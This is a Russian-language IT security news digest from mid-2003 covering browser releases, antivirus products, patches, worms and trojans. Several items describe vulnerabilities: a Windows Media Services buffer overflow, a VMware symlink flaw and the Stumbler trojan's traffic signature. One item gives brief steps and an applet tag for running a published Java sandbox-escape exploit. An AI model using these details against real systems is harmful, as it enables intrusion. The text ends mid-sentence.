Как сообщает linux.org.ru, вышла новая версия браузера Mozilla - Mozilla 1.4 и основанный на Mozilla 1.4, Netscape 7.1. Из нововведений в Mozilla: Mozilla на Windows теперь имеет поддержку аутентификации через NTLM, пересмотрена система закладок (включают папку коренного уровня, появилась возможность иметь две разноименных закладки, указывающих на одно и то же место, иконки сайта в Bookmark Manager и Bookmarks Sidebar, а также поддерживаются метки в разделителях), Composer теперь поддерживает click and drag динамической картинки, а также изменение размера таблицы, в почтовом клиенте теперь есть контекстное меню для junk-mai, пользователи теперь могут указывать 'blank page,' 'home page,' или 'последняя страница посещения' для каждого первого окна, нового окна и нового таба и т.д. Качайте, пробуйте, сравнивайте. Пресс-релиз Mozilla - http://www.mozilla.org/releases/mozilla1.4/ Пресс-релиз Netscape - http://www.mozillazine.org/talkback.html?article=3345
1/07/2003 13:31 Антивирусная защита становится дешевле.
С первого по тридцать первое июля 2003 года включительно в компании Panda Software Russia действует специальное предложение: антивирусные корпоративные пакеты на три года можно приобрести по цене подписки на два года. Благодаря этой акции Panda Software Russia клиенты компании получают возможность существенно сэкономить при покупке корпоративной антивирусной защиты для локальных сетей любого размера и любой сложности. Так, например, пользующиеся наибольшим спросом в корпоративной продуктовой линейке программы Panda Antivirus for Desktops and File Servers и Panda Antivirus for Desktops, File and Exchange Server, будут стоить на 20% дешевле. При этом стоимость одной лицензии наиболее популярных корпоративных продуктов составит около 1,5 рублей в день. Корпоративные программы компании входят в два пакета – Panda Antivirus Enterprise Suite и Panda PerimeterScan. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=171
1/07/2003 13:13 Не даст ли мотор браузера Microsoft обратную вспышку?
Возможно, что, ликвидировав Internet Explorer (IE) как самостоятельный продукт и сделав неопределенным будущее текущей версии браузера, IE 6, Microsoft, сама того не желая, начала истребление собственного детища. В начале июня Microsoft подтвердила, что она больше не будет выпускать никаких самостоятельных версий IE, а сделает его составной частью операционной системы Windows. Этот шаг вызвал беспокойство у компаний, предоставляющих своим заказчикам услуги через интернет, и дал повод некоторым аналитикам заключить, что виртуальной монополии IE и статусу этого браузера как стандарта де-факто приходит конец. Первые признаки проблемы проявились 7 мая, когда менеджер программы IE Брайан Кантриман проговорился в онлайновом чате, что IE6 — это «последняя самостоятельная инсталляция» браузера, которым пользуются свыше 90% веб-серферов. Менее чем месяц спустя британский банк First Direct, предоставляющий услуги в онлайне и по телефону (дочерняя компания HSBC) направил e-mail 600 тыс. своих клиентов с предупреждением, чтобы они до 30 июня загрузили последнюю версию Internet Explorer. В письме говорилось, что Microsoft прекратит предоставлять IE для отдельной загрузки пользователям Windows 95 и 98. Microsoft опровергла эту информацию, заявив, что First Direct ошибается. Более подробности - http://www.zdnet.ru/?ID=302941
1/07/2003 13:00 Три миллиона серверов в Сети контролируются хакерами.
Специализирующаяся по компьютерной безопасности фирма Trustcorps сообщила о том, что хакеры могут контролировать миллионы серверов в интернете, причем владельцы серверов об этом даже не подозревают. Под словом "контролировать" в Trustcorps понимают то, что хакер имеет доступ в чужую систему и может выполнять с ней любые действия по собственному желанию. Ориентировочное число контролируемых хакерами серверов составляет три миллиона. Впрочем, получили эту величину в Trustcorps весьма сомнительным образом. Специалисты компании подсчитали число взломанных систем простым умножением. Они предположили, что каждый хакер имеет доступ, в среднем, к 600-800 системам. Число активных хакерских групп составляет около тысячи, в каждой группе имеются, в среднем, пять опытных хакеров. Умножение 600 на 1000 и затем на 5 как раз дает, в итоге, искомые три миллиона. Ситуация может оказаться и хуже, если вместо 600 компьютеров на одного хакера взять 800: тогда получится, что 4,8 млн. серверов принадлежат неизвестно кому. Многие эксперты уже назвали сообщение Trustcorps полным нонсенсом. Действительно похоже, что многие цифры взяты компанией с потолка. В Trustcorps и сами относятся к своим вычислениям не слишком серьезно. Однако признавая некоторую условность вычислений, глава компании Ник Рэй высказался в том смысле, что в каждой шутке - лишь доля шутки, и дела с компьютерной безопасностью обстоят нерадужно. Подробнее - http://www.techworld.com/news/index.cfm?fuseaction=displaynews&NewsID=219
30/06/2003 19:12 Построение Dial-Up сервера в Linux.
На сайте Earthweb опубликована очередная статья Карлы Шрёдер об основах и технологии построения Dial-Up сервера на базе ОС Linux. Cервер строится на базе одно-дискетного дистрибутива Freesco с использованием протокола PPP (point-to-point protocol) и NAT (cетевая трансляция адресов, он же маскарадинг). Также рассмотрены механизмы аутентификации PAP и CHAP. Cтатья - http://networking.earthweb.com/netos/article.php/222864
30/06/2003 18:08 Секретную сотовую связь в России построят на базе "МегаФона".
Как решила конкурсная комиссия Федерального агентства правительственной связи и информации (ФАПСИ), АО "Мегафон" станет базовым оператором специальной федеральной подсистемы конфиденциальной связи. Таким стало последнее решение, которое принято ФАПСИ, прекращающим свою деятельность с 1 июля. По сообщению пресс-центра ФЦП "Электронная Россия", комиссия признала ОАО "Мегафон" победителем в открытом конкурсе. Победа в конкурсе присуждена по сумме набранных баллов, согласно условиям и положениям конкурсной документации. Второе место заняло ОАО "Вымпелком". АО "Мегафон" станет базовым оператором, предоставляющим транспортную среду для функционирования специальной федеральной подсистемы конфиденциальной сотовой связи. Напомним, что с 1 июля текущего года ФАПСИ упраздняется, а его функции передаются Федеральной службе безопасности РФ, Службе внешней разведки и службе специальной связи и информации при Федеральной службе охраны РФ. Источник - http://www.runet.ru
30/06/2003 17:23 Онлайновый сканер троянов.
GFI Software Ltd. предлагает бесплатно просканировать вашу систему на наличие известных троянов. Для сканирования необходимо наличие на компьютере ОС: Windows 2000, XP, .NET Server, NT 4, ME, 98, а также IE версии выше 5.0 с включённой поддержкой ActiveX. Подробности - http://www.trojanscan.com/
30/06/2003 17:09 Есть подозрение, что спамеры ставят себе на службу ваши ПК.
Возможно, что распространители спама рассылают вирусы, которые позволяют им анонимно отправлять спам через домашние компьютеры ничего не подозревающих пользователей. Компания MessageLabs, управляющая серверами, которые защищают ее клиентов от спама и вирусов, проанализировала свои данные и пришла к выводу, что массовая рассылка непристойных электронных сообщений все чаще осуществляется из тех интернет-адресов, откуда перед этим рассылались вирусы, вложенные в e-mail. «Корреляция довольно высока, — говорит старший технолог MessageLabs по антиспаму Мэтт Сержент. — В распространении вирусов было замечено около 30 тыс. машин, которые теперь содержат программное обеспечение open-proxy». Open proxies, или «открытые ретрансляторы», это компьютеры, способные пересылать электронные письма или другие данные по сети, предварительно уничтожая исходную информацию об адресе отправителя, по которой можно определить источник трафика. 30 тыс. компьютеров — это примерно 14% от общего числа открытых ретрансляторов, которые MessageLabs засекла как источники массовой рассылки непрошеной почты, или спама. Если это правда, то данное наблюдение может подлить масла в огонь разгорающейся борьбы со спамерами. В начале этого месяца Федеральная торговая комиссия (FTC) США запросила у Конгресса дополнительные полномочия на преследование и наказание тех, кто занимается массовой рассылкой e-mail. А в середине мая FTC и правоохранительные службы других государств разослали предупредительные письма операторам 1000 серверов e-mail с призывом закрыть свои ретрансляторы. Подробности - http://www.zdnet.ru/?ID=302848
30/06/2003 16:52 Новые проблемы с Hyper-Threading в Windows XP SP1.
Ранее сообщалось о проблемах с производительностью, возникающих на компьютерах на базе процессоров Intel с технологией Hyper-Threading после установки первого сервис-пака для ОС Windows XP. Однако компания Microsoft (по сообщениям "Компьюленты") сообщила об обнаружении еще одной проблемы аналогичного характера. Она связана с возникновением сбоев в модуле Ky.sys и проявляется вследствие некорректной обработки пакетов запроса ввода-вывода (IRP). Возникающая при этом утечка ресурсов и приводит к сбоям. В Microsoft создали заплатку, исправляющую данный недостаток, однако устанавливать ее рекомендуется лишь в крайних случаях. Большинству пользователей лучше дождаться нового сервис-пака. Подробности - http://support.microsoft.com/default.aspx?scid=kb;LN;812035
30/06/2003 16:46 В киберпространстве создается карта интернет-цензуры.
Интернет-цензура в некоторых странах (таких, как Китай, Иран, Саудовская Аравия) давно уже стала притчей во языцех. Ученые Гарварда, Кембриджа и университета города Торонто объединили свои усилия для создания "цензурной карты интернета", пользуясь которой любой человек сможет определить, блокируется ли тот или иной сетевой адрес в отдельно взятой стране. Проект, созданный по типу распределенных вычислений, отслеживает сайты, на доступ к которым есть ограничения, независимо от того, кто эти ограничения наложил - правительство, провайдеры, корпорации или общественные библиотеки. Мониторинг сайтов осуществляется в 15 странах мира. По словам организаторов проекта, отслеживать барьеры и предавать их огласке надо для того, чтобы не стимулировать их появление. Даже блокирование сайтов с детской порнографией или нелегальным ПО активисты проекта считают "благородным начинанием, но опасным прецедентом", боясь, что подобные сайты будут лишь первым звеном в числе неугодных правительству (в данном случае речь идет о США). Посему цель проекта формулируется следующим образом - рассказать, что находится под запретом, почему и как оно заблокировано. Cайт проекта - http://cyber.law.harvard.edu//filtering/app/
30/06/2003 16:41 HTML Source Code Explorer Bar.
Внимание, данная программа уже есть в колонке program of the day, но тем не менее хотелось бы о ней упомянуть и в главных новостях, так как она будет очень полезна определенному кругу людей. Описание: Очень удобная программа, которая покажет исходник любой странички, а также компонент типа форм в виде удобной структуры. Более того, программа в реальном времени позволяет изменять значения любых полей формы перед отправкой, даже скрытых(hidden) полей. Это незаменимый инструмент для вебмастеров, а особенно для людей работающих с XSS(cross- site scripting) и изучающих почтовые веб интерфейсы. Платформа: Windows. Сайт программы: http://www.vdberg.org/~richard/htmlbar.html
29/06/2003 19:53 Список суперкомпьютеров top500 - 2003.
Как замечает SYSADMINS.RU, в Heidelbergе только что закончилось летнее шоу суперкомпьютеров 2003 и обновился список TOP500. Это уже 21 обновление списка. В верхушке рейтинга теперь большое количество 64х и даже 32х битных кластеров. На первом месте все тот же непобедимый NEC Earth Simulator с его 35.86 TFLOPS из Японии. На втором месте HP ASCI Q - 13.88 TFLOPS. На третьем месте MCR Linux Cluster - 7.634 TFLOPS. На четвертом месте IBM ASCI WHITE - 7.304 TFLOPS. На пятом IBM SEABORG - тоже 7.304 TFLOPS. Необходимо отметить, что самый быстрый наш компьютер расположен на 97 месте. Как указано в списке, им является сделанный самими разработчиками МВС1000M, собранный из 768 процессоров Alpha 21264 (667 MHz). Установлен в Межведомственном Суперкомпьютерном Центре, что расположен по адресу: Москва, Ленинский проспект, 32а. Для заинтересованных приводим ссылку на описание суперкомпьютера. Также на 375 месте расположен принадлежащий СберБанку Hewlett-Packard SuperDome 750. Полный список - http://www.top500.org/list/2003/06/ Описание МВС100М - http://www.jscc.ru/cgi-bin/show.cgi?path=/hard/mvs1000m.html&type=2
29/06/2003 19:46 Статья от Microsoft о безопасности Windows Server 2003.
Майкл Ховард от имени корпорации Microsoft анонсировал выпуск новой статьи, посвящённой обзору изменений в системе безопасности Windows Server 2003. Полное название "Development Impacts of Security Changes in Windows Server 2003". Статья - http://msdn.microsoft.com/library/default.asp?...
29/06/2003 19:34 Уязвимость в VMware.
Команда разработчиков проекта VMware (виртуальная машина, позволяющая на машине под управлением ОС Linux эмулировать абсолютно независимую вторую машину под управлением ОС Windows) cообщает о существовании уязвимости в этом программном продукте. Как написано в письме, при помощи манипулирования с символическими ссылками в директории /tmp, можно повысить привилегии в системе для локального пользователя. Более подробно уязвимость пока не описывается. Для временного закрытия уязвимости рекомендуется при помощи переменной среды TEMPDIR cоздать ссылку на другую (безопасную) директорию. Уязвимсоть обнаружена в версии 4.0. Выпуск патча планируется в скором времени. Подробности - http://www.vmware.com/support/kb/enduser/std_adp.php?p_faqid=1019
29/06/2003 17:39 Авария у Golden Telecom притормозила работу всего Рунета.
Вечером 25 июня посетители многих крупных отечественных интернет-сайтов испытывали трудности с загрузкой страниц. Причиной этого, по нашей информации, стала авария на Golden Telecom. Авария, как стало известно, произошла вечером того же дня, вследствие чего был усложнен доступ ко многим сайтам, хостящимся у Golden Telecom. В частности, были проблемы с открытием сайтов почтовой службы Mail.ru, поисковой системы "Апорт" и системы контекстной рекламы "Бегун". Сообщения же об аварии нет на сайте компании, не получили его и клиенты Golden Telecom. "Вечером 25 июня, приблизительно с 21 часов были зафиксированы устойчивые потери при передаче данных: примерно каждый второй пакет не проходил". - Сообщил нам директор по рекламе и PR компании "Бегун" Алексей Басов. - "Наши технические специалисты быстро выяснили, что подобная ситуация наблюдается на многих других крупных сайтах. Для пользователей "Бегуна" проблема выразилась в неравномерной скорости загрузки страниц интерфейса и падению трафика. Для "Бегуна" - уполовиниванию доходов за этот период". Нормальная работа системы была восстановлена в ночь на 26 июня. Источник - http://www.runet.ru
29/06/2003 17:23 Сервис-пак для Windows Server 2003 появится в декабре.
Первый комплект исправлений и дополнений к новой операционной системе Windows Server 2003 будет выпущен в декабре нынешнего года. Сообщение об этом появилось на страницах издания Windows & .Net Magazine. По информации данного издания, одним из важных нововведений в сервис-паке станет мастер Security Configuration Wizard, предназначенный, как явствует из названия, для конфигурирования системы безопасности сервера. В зависимости от роли каждого конкретного сервера (работа с электронной почтой, СУБД, хранение файлов, управление веб-сайтом и т.д.), мастер будет отключать ненужные службы, которые могут послужить целями для атак. Работа мастера основана на базе данных в формате XML, в которую будет занесена информация о тех или иных серверных программных продуктах. Следует напомнить, что еще одной важной функцией первого сервис-пака для Windows Server 2003 станет реализация поддержки 64-разрядных процессоров AMD Opteron. Источник - http://www.bezpeka.com
29/06/2003 16:36 Многофункциональный сетевой червь Mumu.
Компания Symantec предупреждает о появлении нового сетевого червя W32.Mumu.B.Worm. Червь обладает сложной структурой и состоит из нескольких компонентов. В его состав входит программа для поиска уязвимых компьютеров, модуль для запуска приложений на удаленной машине и троян, ворующий информацию с чужих компьютеров. Для запуска на удаленном компьютере червь использует общедоступную программу Remote Process Launcher фирмы SysInternals. При распространении червь сканирует определенный диапазон IP-адресов, выбор которого зависит от адреса пораженной машины. Чтобы войти в систему, червь использует встроенный список паролей. Затем программа соединяется с уязвимыми компьютерами и переписывает на них свои копии, которые затем запускаются утилитой Remote Process Launcher. Запущенная троянская программа начинает перехватывать все данные, вводимые с клавиатуры. Собранная информация отправляется автору червя по электронной почте. Источник - http://www.symantec.com/
29/06/2003 15:31 Суперкомпьютер от CRAY будет работать под SuSE.
Для строящегося суперкомпьютера Red Strom компания Cray выбрала в качестве операционной системы Linux-дистрибутив от немецкой компании SuSe. SuSe Linux Enterprise Server for AMD64. Заявленная производительность Red Storm составляет 40 терафлопс (триллионов операций в секунду), и он должен стать самым мощным суперкомпьютером в США. Подробности - http://compulenta.ru/2003/6/27/40425/
29/06/2003 15:09 Бета-тестирование "Антивируса Касперского" для файловых и почтовых Unix-серверов 4.5 начинается.
"Лаборатория Касперского", сообщает о начале бета-тестирования новой версии Антивируса Касперского™ для Linux, FreeBSD и OpenBSD, а также Антивируса Касперского™ для Linux, FreeBSD и OpenBSD Mail Server. Компания приглашает всех желающих принять участие в программе внешнего тестирования продуктов, пришедших на смену предыдущей версии 4.0. Они получили индекс 4.5 и включают в себя ряд существенных изменений и доработок. Антивирус Касперского™ для Linux, FreeBSD и OpenBSD предназначен для обработки файловых систем серверов, работающих под управлением операционных систем Linux, FreeBSD или OpenBSD. Он позволяет эффективно осуществлять поиск и нейтрализацию вредоносных кодов во всех объектах файловых систем, расположенных на сервере, при этом располагая удобной для пользователя системой автоматической загрузки обновлений антивирусной базы, а также гибким механизмом конфигурации антивирусной программы. Антивирус Касперского™ для Linux, FreeBSD и OpenBSD Mail Server обладает всеми возможностями Антивируса Касперского™ для Linux, FreeBSD и OpenBSD, а также имеет ряд специфических функций. Среди них антивирусная проверка входящего и исходящего почтового SMTP-трафика сервера с последующей нейтрализацией обнаруженных вредоносных кодов в зараженной корреспонденции, обработка сообщений в соответствии с правилами, заданными для групп отправителей и получателей, и широкий спектр различных режимов фильтрации электронной почты. Подробнее - http://www.kaspersky.ru/news.html?id=1300907
29/06/2003 14:47 В России создана коалиция по борьбе со спамом.
Компания Internet Projects (Информационный канал Subscribe.Ru), компания "Ашманов и партнеры", "Лаборатория Касперского" объединились для борьбы со спамом, сообщается в совместном пресс-релизе. Первым этапом совместного проекта по борьбе со спамом стало создание электронного журнала "Спамтест". В нем будут рассматриваться все аспекты борьбы со спамом - виды нежелательной почты и их эволюция, различные технологии фильтрации, программное обеспечение, приемы спамеров и приемы самозащиты, новости индустрии фильтрации содержания. Журнал содержит статьи и новости по данной тематике, конкретные советы, обзоры и полезные ссылки, другие материалы. Cайт проекта - http://www.spamtest.ru/
28/06/2003 20:39 Книги по Windows 2003.
От Rend-а c форума RTFM сайта www.sysadmins.ru стала известна ссылочка на электронные книги по операционной системе Windows 2003. Ccылка - http://www.winbase.org/modules/news/index.php?storytopic=8
28/06/2003 20:32 Моcква: об участниках Конференции по IT-Security.
По состоянию на текущий момент, на конференцию «IT-Security: новые требования к участникам рынка информационной безопасности» подтвердили своё участие следующие государственные структуры: Министерство Обороны РФ, Министерство путей сообщения РФ, Министерство РФ по связи и информатизации (Управление безопасности; Департамент Информатизации), Министерство промышленности, науки и технологий РФ, Министерство экономики Московской области, ФГУП «Центр информационных технологий и систем органов исполнительной власти – ЦИТиС», Государственный комитет РФ по стандартизации и метрологии, ФСБ России, ГУСТМ МВД России, НТЦ «Атлас», Генеральный Штаб Вооруженных сил РФ, УМЦ Новых технологий ФАПСИ. Уже подтвердили своё участие компании: Microsoft, Jet Infosystems, Лаборатория Касперского, Диалог Наука, Аладдин, Информзащита, ЕВРААС, Элвис плюс, Борлас Ай Би Си и ещё 27 компаний. В конференции примут участие более 120 человек. Полный список будет опубликован 30 июня 2003 года на официальном сайте конференции www.egovernment.ru. По вопросам участия обращаться в Оргкомитет конференции: (095) 2516654, timokhov@groteck.ru Подробности - http://www.egovernment.ru
28/06/2003 20:28 Сервер INAME.COM.UA атакован хакерами.
В начале этой недели расположенный в США сервер компании iName.com.ua, предоставляющей услуги хостинга, подвергся атаке хакеров. К сожалению, действия злоумышленников нанесли ощутимый урон как самой компании, так и ее клиентам. "Реальную сумму ущерба оценить очень тяжело, так как мы потеряли много информации, которая была очень важна для наших клиентов", - констатирует генеральный директор iName.com.ua Любомир Гайдамака. Сейчас на сервере продолжаются восстановительные работы. Тем не менее, большинство важной информации о клиентах iName.com.ua безвозвратно утеряно. Компания временно размещает информацию о клиентах на других своих серверах. К понедельнику планируется выход на нормальный режим работы. На атакованном сервере будет установлена более надежная ОС (FreeBSD), после чего он заработает на полную мощность уже на следующей неделе. Параллельно компания продолжит процесс обновления серверного парка, устаревшего ПО и комплектующих. "К сожалению, в нашей работе не исключены подобные ситуации", - отмечает Евгений Нечипоренко, технический директор iName.com.ua. - "Поэтому, нами принято решение перевести все наши сервера, которые размещены в Силиконовой долине в США, на операционную систему FreeBSD, которая заменит ОС RedHat Linux. На локальных серверах такая замена была осуществлена более года назад, и мы более, чем довольны, работой данной ОС". Источник - http://www.internet.ru
28/06/2003 18:21 Подробности переполнения буфера в Windows Media Services.
Стали известны подробности уязвимости в Windows Media Services. Удаленный пользователь может послать чрезмерно длинный запрос к nsiislog.dll, чтобы вызвать переполнение буфера. Уязвимость приводит к стандартному переполнению стека с возможностью записи произвольного значения в EIP регистр, в результате чего возможно удаленное выполнение произвольных команд на сервере с привилегиями IWAM_machinename. Подробности - http://securitylab.ru/default.asp?ID=38589
28/06/2003 18:07 "Лаборатория Касперского" провела семинар для менеджеров по безопасности Сбербанка РФ.
29 мая в гостинице "Спутник" состоялся организованный "Лабораторией Касперского" семинар для представителей региональных филиалов Сбербанка, посвященный продуктам компании и их оптимальному использованию. Целью семинара была поддержка заказчиков, работающих с продуктами "Лаборатории", обсуждение текущих вопросов по взаимодействию с территориальными отделениями СБ РФ в регионах, а также анонс новых технологий. Для "Лаборатории Касперского" семинар стал уникальной возможностью собрать вместе представителей Сбербанка из более чем 80 регионов России, одновременно услышать мнение региональных сотрудников крупнейшей российской банковской структуры. На семинаре активно обсуждались насущные вопросы функционирования систем антивирусной защиты, программы поддержки бизнес-заказчиков, деятельности сервисной поддержки. Одним из ярких событий семинара стала презентация новых возможностей Антивируса Касперского™ версии 4.5, выходящего на рынок в ближайшее время. Подробности - http://www.kaspersky.ru/news.html?id=1243872
28/06/2003 17:14 Дефицит IP-адресов — это миф.
Топ-менеджер организации, ответственной за интернет-адреса в Азиатско-Тихоокеанском регионе, считает «мистификацией» предположения о том, что Азии или любой другой части света угрожает дефицит интернет-адресов. Пол Уилсон, генеральный менеджер организации APNIC (Asia Pacific Network Information Center), которая распределяет и регистрирует ресурсы интернет-адресов в своем регионе, не ощущает никакого дефицита и утверждает, что существующей системы адресов хватит еще на одно или даже на два десятилетия. «За источником этого слуха я охочусь последние пять лет — с тех пор как занял этот пост в APNIC. Существует несколько причин, вводящих людей в заблуждение», — сказал он. APNIC — один из четырех действующих региональных интернет-регистраторов. Эта организация назначает и регистрирует службы, поддерживающие работу интернета во всем мире. Регистратор получает блоки адресов через службу Internet Assigned Numbers Authority (IANA) в США и распределяет их среди ISP Азиатско-Тихоокеанского региона и других организаций, которым они требуются. Некоторые аналитики предсказывают, что IP (Internet protocol)-адреса закончатся всего через два года. Эксперты отмечают также исторический дисбаланс в схеме распределения адресов: большинство адресов якобы забрали себе США, оставив интернет-массам Китая сущие крохи. Подробности - http://www.zdnet.ru/?ID=302680
28/06/2003 16:45 Microsoft выиграла апелляцию по делу о Java.
Апелляционный суд штата Вирджиния в четверг отменил решение суда низшей инстанции, обязавшего Microsoft использовать разработанную Sun Microsystems Inc. технологию Java в операционных системах Windows XP, сообщает PC World.com. По мнению представителей Sun Microsystems, Microsoft намеренно игнорирует Java и не использует ее в своих программных продуктах. Java позволяет программам работать с любой операционной системой, будь то Windows, MacOS или какая-либо другая ОС. В иске на сумму в один миллиард долларов, поданном против Microsoft, адвокаты Sun Microsystems обвинили Microsoft в намеренной порче элементов Java, входивших в Windows XP, с целью последующего исключения продукта Sun из своей операционной системы. По мнению Sun, такие действия Microsoft продиктованы боязнью того, что Java может нарушить гегемонию Windows на рынке операционных систем. Источник - http://www.lenta.ru
27/06/2003 20:28 Вышел Windows 2000 Service Pack 4.
Пока только для Английской и Немецкой версии. Качать его нужно здесь: http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp
26/06/2003 15:51 В Сети обнаружен вирус Sobig.E.
Компания Panda Software сообщила о появлении в Сети очередной вариации почтового червя Sobig, который является одним из лидеров вирусных хит-парадов последнего времени. Характерным отличием Sobig.E является то, что вредоносный код приходит в электронных письмах в сжатом с помощью архиватора ZIP виде. Поскольку архивы редко используются для пересылки вирусов, многие пользователи могут попытаться разархивировать и запустить вложение. В остальном, характеристики Sobig остались прежними. Вирус собирает на компьютере почтовые адреса и рассылает по ним свои копии. Темы писем с вирусом ничего не говорят о возможном наличии вируса. Кроме того, в заголовках проставляется поддельный обратный адрес support@yahoo.com, то есть заразное письмо выдается за послание от службы поддержки портала Yahoo. Источник - http://ww.viruslab.ru
26/06/2003 15:18 Сервис-пак для Windows Server 2003 появится в декабре.
Первый комплект исправлений и дополнений к новой операционной системе Windows Server 2003 будет выпущен в декабре нынешнего года. Сообщение об этом появилось на страницах издания Windows & .Net Magazine. По информации данного издания, одним из важных нововведений в сервис-паке станет мастер Security Configuration Wizard, предназначенный, как явствует из названия, для конфигурирования системы безопасности сервера. В зависимости от роли каждого конкретного сервера (работа с электронной почтой, СУБД, хранение файлов, управление веб-сайтом и т.д.), мастер будет отключать ненужные службы, которые могут послужить целями для атак. Работа мастера основана на базе данных в формате XML, в которую будет занесена информация о тех или иных серверных программных продуктах. Следует напомнить, что еще одной важной функцией первого сервис-пака для Windows Server 2003 станет реализация поддержки 64-разрядных процессоров AMD Opteron. Источник - http://www.winnetmag.com/WindowsServer2003/Index.cfm?ArticleID=39365
26/06/2003 14:47 Novell представила систему Novell Nterprise Linux Services.
25 июня компания Novell представила систему Novell Nterprise Linux Services - интегрированное решение для организации сервисов по работе с файлами, для печати, обмена сообщениями, работы с каталогом и т.д. Novell Nterprise Linux Services может функционировать в операционных средах SuSE Linux Enterprise Server и Red Hat Enterprise Linux. Помимо собственно программных средств, Novell возьмет на себя задачи по комплексной технической поддержке, обучению персонала и оказанию консультационных услуг. Компания Novell уже сообщила о подписании соглашений с компаниями Dell, HP и IBM, согласно которым эти компании будут предлагать решения Novell для среды Linux своим заказчикам и обеспечивать техническую поддержку таких решений. Базовая версия Novell Nterprise Linux Services состоит из большого числа сетевых служб Novell, интегрированных в единое решение. Набор сервисов включает в себя службы идентификации личности Novell eDirectory и DirXML, сервисы для работы с файлами Novell iFolder, сервисы печати iPrint, сервисы передачи сообщений NetMail, сервисы управления ZENworks for Servers и систему Virtual Office для организации доступа к информационным ресурсам компании для удаленных сотрудников. Компонент Novell iManager обеспечивает администрирование служб Nterprise Linux Services через единый интерфейс на базе браузера. Источник - http://www.compulenta.ru
26/06/2003 13:30 McAfee VirusScan PDA: вирус до КПК не доберется.
Поставщик средств защиты Network Associates (NAI) представил антивирусную разработку для беспроводных портативных устройств, использующих технологии Wi-Fi и Bluetooth. Новый McAfee VirusScan PDA разработан специально для моделей, работающих под управлением новейшей ОС для портативных систем Windows Mobile 2003. По словам разработчиков, первым предложит специальную пользовательскую версию антивируса компания Dell в своем КПК Axim X5. McAfee VirusScan PDA имеет возможности сканирования устройства в реальном режиме времени, автоматическое или плановое обновление, а также синхронизированное сканирование с пользовательским ПК. Источник - http://www.cnews.ru
26/06/2003 12:56 Эксплоит уязвимости в Java Media Framework.
Marc Schoenefeld опубликовал эксплоит уязвимости в виртуальной машине Java, ранее преданной гласности. Как пишет сам автор эксплоита, его код демонстрирует, что уязвимость в Java Позволяет не только привести к DoS броузера, но и получить доступ к пространству системной памяти при помощи апплета, который не является подписанным (заверенным), тем самым обойдя систему безопасности пресловутой "песочницы" (sandbox) Java. Для проверки демонстрации предлагается использовать java media framework 2.1.1.c (в версии "е" уязвимость устранена). Необходимо скомпилировать Джава-код эксплоита с поддержкой jmf-классов и создать страницу, вызывающую класс ReadEnv (наподобие <applet code=ReadEnv.class></applet>) (естественно, вставив туда апплет). Подробности и код - http://archives.neohapsis.com/archives/bugtraq/2003-06/0200.html
26/06/2003 12:33 Патч уязвимости в Microsoft Windows Media Services.
Вышел бюллетень от Microsoft MS03-022, в котором описывается уязвимость в Windows Media Services - cервисе, поддерживающем доставку медиа-данных к клиентам по сети при помощи малтикастовых потоковых технологий (multicast streaming). В случае малтикастового потока сервер не имеет непосредственного соединения с клиентом, посылается просто потовый мультимедиа пакет, который затем принимается клиентом. Тем не менее, в составе ОС Windows 2K (Server, Advanced Server и Datacenter Server) имеется возможность регистрации малтикастовой передачи. Эта возможность предоставляется динамической библиотекой, являющейся расширением ISAPI (Internet Services Application Programming Interface) - nsiislog.dll. При добавлении сервиса Windows Media через пункт "удаление/добавление программ", эта библиотека автоматически добавляется в директорию скриптов Вэб-сервера IIS. После этого nsiislog.dll автоматически загружается и используется в процессе работы IIS. Господин Brett Moore из Security-assessment обнаружил уязвимость в механизме обработки этим модулем входящих запросов от внешних клиентских программ. Атакующий может послать специально оформленный HTTP-запрос, при обработке которого IIS либо рушится, либо позволяет запустить произвольный код в пространстве памяти и с привилегиями Вэб-сервера (насколько я понимаю - SYSTEM). В конце бюллетенф, как обычно - стандартная M$ отмазка: "Сервис не установлен по умолчанию и для того, чтобы обнаружить уязвимость оной, злоумышленник должен знать, на каком компьютере атакуемой сети установлен сервис, чтобы послать свой запрос именно туда". Можно подумать, что для атакующего будет сложно послать запрос всем компьютерам сети с установленным Win2K. Тем не менее, патч выпущен. Уязвимости присвоен код "Important". Подробности - http://www.microsoft.com/security/security_bulletins/ms03-022.asp
25/06/2003 15:56 Некоторая информация о трояне Stumbler.
Довольно интересный пресс-релиз компании Lanscope посвящён описанию нового трояна, которому присвоено имя Stumbler (компания ISS) или 55808 (Intrusec, которая первой выполнила подробный анализ кода трояна). Пресс - релиз датирован аж 9 июня сего года. Фирма Lanscope специализируется на компьютерной безопасности и базовым её продуктом является IDS StealthWatch. Расположена в Атланте, США. В упомянутом пресс-релизе один из сотрудников фирмы, Jody Ma, охаректиризовал появившийся троян, как троян нового, третьего поколения. Чем же отличаются поколения троянцев? Первое поколение троянов имело в своём теле ккординаты своего создателя (зачастую, в зашифрованном виде), на которые, собственно, и посылались данные о заражённой системе. Второе поколение троянов открывало на заражённой машине определённый порт, сидя на котором троян ожидал команды на активизацию (проникновение) в систему. Совершенно очевидно, что оба поколения троянов довольно легко определялись современными системами определения вторжения (IDS). Своершенно по-другому ведёт себя новая разновидность трояна. Заражённая машина пытается соединиться с совершенно произвольным (случайным) адресом и произвольным портом. Единственное, что является общим при передаче пакетов - это размер TCP-окна в SYN-пакете, равный 55808 байт (этот размер определяет максимальны размер пакета, на который не требуется подтверждение от получателя). Троян может быть использован для потенциального создания распределённой DoS-атаки (DDoS). Как утверждает аналитик по безопасности Faron Golden, наблюдается увеличение трафика сетевого сканирования, вызванного эпидемией трояна. Утверждается о пробах 63% пространства IP-адресов каждые 17 часов (данные, напомним, от 9 июня). Таким образом, выходит, что единственным признаком, по которому можно определить троян - это как раз размер окна TCP, равный 55808. Другие поля внутри заголовка (ISN, номер порта) содержат зашифрованную информацию о получателе ( Lancope называют его контроллером), который может быть использован инфицированным хостом для дальнейшего соединения. IDS, основанные на определении троянов по их сигнатурам, не в состоянии определить подобные трояны третьего поколения. Некоторыми экспертами по безопасности высказывается предположение о том, что троян представляет собой первый этап, целью которого является сбор сведений о пространстве адресных имён, а каждая заражённая машина является как бы клиентом целой распределённой сети. Никак до сих пор не удаётся обнаружить первоисточник (центр) этой сети. Вроде бы ISS отловили один из клонов, который должен был посылать данные на порт 22 (ssh) по адресу 12.108.65.76, однако, такого адреса не существует в природе. Теоретически с помощью специального пакета данных, отправленного трояну, этот адрес можно изменить. Правда, только теоретически, потому что в той копии, которую отловили Intrusec, эта функция тоже была отключена. Как уже говорилось ранее, "лошадка" была обнаружена в Linux-системах, однако, по утверждениям той же Intrusec, первоначальный вариант трояна могли быть созданы как раз для Windows. В ОС Linux троян создаёт 2 файла 